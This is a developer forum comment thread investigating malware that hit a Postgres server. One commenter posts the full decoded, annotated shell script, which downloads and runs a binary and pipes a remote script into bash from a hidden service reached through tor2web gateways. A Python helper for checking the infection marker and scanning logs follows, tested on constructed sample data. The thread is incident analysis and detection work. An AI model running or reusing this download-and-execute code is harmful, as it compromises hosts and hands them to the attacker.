DEV Community

Discussion on: Investigation into Postgres malware (hack?)

Valts Liepiņš

For anyone else interested, here is the malicious script after base64 decode and some tidying up:

# Silence everything: stdout and stderr of the whole script go to /dev/null.
exec &>/dev/null

export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

# Hidden-service label that is prepended to each tor2web gateway below.
t=tencentxjy5kpccv

# Home directory of the current user, looked up in /etc/passwd by UID.
dir=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)

# Find the first directory that is both writable and allows execution
# (i.e. not mounted noexec): write a one-line script, run it, remove it,
# and stay in that directory for the rest of the script.
for i in $dir /tmp /var/tmp /dev/shm /usr/bin ; do
  echo exit > $i/i && \
    chmod +x $i/i && \
    cd $i && \
    ./i && \
    rm -f i && \
    break;
done

# x <host>: download /int from <host> (wget first, curl as fallback, TLS
# verification disabled, User-Agent "-") into a file named after the md5 of
# the current date, make it executable, run it, and delete it.
x() {
  f=/int
  d=./$(date|md5sum|cut -f1 -d-)
  wget -t1 -T99 -qU- --no-check-certificate $1$f -O$d || \
    curl -m99 -fsSLkA- $1$f -o$d
  chmod +x $d;$d;rm -f $d
}

# u <host>: fetch /crn from <host> and write it to stdout (piped to bash below).
u() {
  x=/crn
  wget -t1 -T99 -qU- -O- --no-check-certificate $1$x || \
    curl -m99 -fsSLkA- $1$x
}

# /tmp/.X11-unix/00 is read as a PID (presumably written by the dropped binary);
# /proc/<pid>/io exists only while that process is alive, so this doubles as an
# "already running" check. Try each tor2web gateway in turn until the binary runs.
for h in d2web.org onion.mn tor2web.io tor2web.to onion.to onion.in.net 4tor.ml onion.glass civiclink.network tor2web.su onion.ly onion.pet onion.ws
do
  if ! ls /proc/$(cat /tmp/.X11-unix/00|head -n 1)/io; then
    x tencentxjy5kpccv.$h
  else
    break
  fi
done

# If the binary still is not running, fetch the /crn script from the first
# gateway that answers and pipe it straight into bash.
if ! ls /proc/$(cat /tmp/.X11-unix/00|head -n 1)/io; then
  (
    u $t.d2web.org ||
    u $t.onion.mn ||
    u $t.tor2web.io ||
    u $t.tor2web.to ||
    u $t.onion.to ||
    u $t.onion.in.net ||
    u $t.4tor.ml ||
    u $t.onion.glass ||
    u $t.civiclink.network ||
    u $t.tor2web.su ||
    u $t.onion.ly ||
    u $t.onion.pet ||
    u $t.onion.ws
  )|bash
fi
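A small triage helper, added here as an example and not part of the original post or of the malware itself. It reimplements the script's own "already running" test (read a PID from `/tmp/.X11-unix/00`, look for `/proc/<pid>/io`) against a simulated filesystem root, and scans log lines for requests to the hidden service's `/int` and `/crn` paths through the tor2web gateways the script iterates over. The gateway list, the `tencentxjy5kpccv` label and the two paths are taken from the decoded script above; the fake root directory and the sample log lines are constructed for the demo and are not real evidence.

```python
import os
import re
import tempfile

# Tor2web gateways the decoded script loops over, in the script's order.
TOR2WEB_GATEWAYS = [
    "d2web.org", "onion.mn", "tor2web.io", "tor2web.to", "onion.to",
    "onion.in.net", "4tor.ml", "onion.glass", "civiclink.network",
    "tor2web.su", "onion.ly", "onion.pet", "onion.ws",
]
# Paths the script requests: /int is a dropped binary, /crn is piped to bash.
PAYLOAD_PATHS = ("int", "crn")
# Marker file the script reads a PID from (relative to the filesystem root).
MARKER_FILE = os.path.join("tmp", ".X11-unix", "00")

# <16-char v2 onion label>.<gateway>/int or /crn, as produced by x() and u() above.
GATEWAY_RE = re.compile(
    r"\b(?P<host>[a-z2-7]{16}\.(?:"
    + "|".join(re.escape(g) for g in TOR2WEB_GATEWAYS)
    + r"))(?P<path>/(?:" + "|".join(PAYLOAD_PATHS) + r"))\b",
    re.IGNORECASE,
)

# Constructed sample log lines (not from the incident) in a generic proxy-log shape.
SAMPLE_LOG = [
    "2020-05-01T10:00:01 postgres GET http://tencentxjy5kpccv.onion.ws/int 200",
    "2020-05-01T10:00:02 postgres GET http://tencentxjy5kpccv.tor2web.io/crn 200",
    "2020-05-01T10:00:03 www-data GET https://example.com/index.html 200",
    "2020-05-01T10:00:04 postgres GET http://tencentxjy5kpccv.onion.in.net/integrity 404",
]


def check_marker(root="/"):
    """Repeat the script's liveness test: PID from the marker file, /proc/<pid>/io under root."""
    marker = os.path.join(root, MARKER_FILE)
    if not os.path.isfile(marker):
        return {"marker_present": False, "pid": None, "pid_alive": False}
    with open(marker) as fh:
        first = fh.readline().strip()
    pid = int(first) if first.isdigit() else None
    alive = pid is not None and os.path.exists(os.path.join(root, "proc", str(pid), "io"))
    return {"marker_present": True, "pid": pid, "pid_alive": alive}


def scan_log_lines(lines):
    """Return (line_number, host, path) for every line that fetches /int or /crn via a gateway."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = GATEWAY_RE.search(line)
        if m:
            hits.append((n, m.group("host"), m.group("path")))
    return hits


def make_fake_root(pid=4242, alive=True, marker=True):
    """Constructed stand-in for a host filesystem (test fixture only, hypothetical layout)."""
    root = tempfile.mkdtemp(prefix="pgmal-")
    if marker:
        os.makedirs(os.path.join(root, "tmp", ".X11-unix"))
        with open(os.path.join(root, MARKER_FILE), "w") as fh:
            fh.write(f"{pid}\n")
    if alive:
        os.makedirs(os.path.join(root, "proc", str(pid)))
        open(os.path.join(root, "proc", str(pid), "io"), "w").close()
    return root


if __name__ == "__main__":
    # Run against a fake root so the demo never touches the real /tmp or /proc.
    print(check_marker(make_fake_root()))
    for n, host, path in scan_log_lines(SAMPLE_LOG):
        print(f"line {n}: {host}{path}")
```

On a real host, call `check_marker()` with the default root; the marker being present is itself an indicator, and a live PID there points at the dropped binary to image before it is killed. The regex deliberately requires the exact `/int` or `/crn` path after the gateway host, so a request for `/integrity` is not a hit.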
sanchitsharma

Thanks Valts, I have added a somewhat commented (whatever I could understand) version to the post itself. Please comment if I might have done anything wrong there.